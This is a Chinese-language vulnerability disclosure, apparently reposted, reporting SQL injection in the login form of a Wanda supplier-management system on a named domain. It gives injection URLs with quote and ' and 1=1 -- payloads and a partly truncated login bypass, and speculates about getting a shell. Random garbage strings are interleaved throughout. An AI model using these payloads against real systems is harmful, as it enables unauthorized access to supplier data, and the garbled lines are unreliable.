万达供应商系统SQL注射漏洞

admin

简要描述：万达某分站sql注入。敏感信息泄露。
详细说明：
6 X3 s3 q7 }) C万达scm系统登陆框sql注入。
0 y" Q! r$ Z! G0 P& Y  l
4 h3 |% D+ {$ I: [8 ]http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
0 b% S( Z; M2 a0 Y
3 z& @! F0 H, j! s
500错误。
# b( i' I) Z# s4 D8 N: m7 p5 [
! g7 V( c; r% V5 A0 t4 U: p用户名随便输，提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
$ {  A4 _* B; R) S! M7 lhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
' b9 r, b; E3 ~9 p截图有一点问题，用户名，和密码输入' and 1=1 --可以得到相同的提示，可自测。）
经过分析，登陆验证的过程应该是：

取用户名查询数据库，有该用户，再用该用户密码和输入的密码进行比对，相同则登陆成功。
http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png

, Y& l0 G' r: j' qoracle数据库，存在注入点。@大连万达，你怎么看？
http://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png
9 ~1 Q6 K: F+ `& V; Z
( x! e+ H6 U$ N4 P系统里有万达的供应商资料什么的,提交数据的地方随便输入'，提交500错误。没深入。目测可shell。
1 H; [; X. R$ Y% u* Q# h7 z漏洞证明：
万达scm系统登陆框sql注入。

http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
. ]" Y$ M- k0 M3 ^' ^7 I8 Z  y3 B' X  W
  k) G- _% C2 n# O8 K0 e
500错误。

用户名随便输，提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
5 W1 |. j( D# x' Yhttp://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png


（截图有一点问题）

怎么饶都饶不过去；经过分析，登陆验证的过程应该是：

' r7 @+ j- X3 e1 Q) r9 e3 a; t取用户名查询数据库，有该用户，再用该用户密码和输入的密码进行比对，相同则登陆成功。

! m& v4 w5 n: a( M4 F绕过：
http://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1
/ n  u9 z& ^: q7 W! r. j

9 }" `- E1 w* {$ _7 E) c! h8 ~oracle数据库，存在注入点。@大连万达，你怎么看？
​系统里有万达的供应商资料什么的，有发布公告，没深入。目测可shell。

0 K' S' [1 Y( w* l: }' ]# z修复方案：
。。。

4 l3 o9 ]* `, Y6 w7 A1 f: \0 b$ j
厂商已经确认
, |6 B+ V& p) Q, {7 s
[/td][/tr]
[/table]

* v6 b9 l) v7 X
/ L) V0 E9 b2 D% k1 {3 C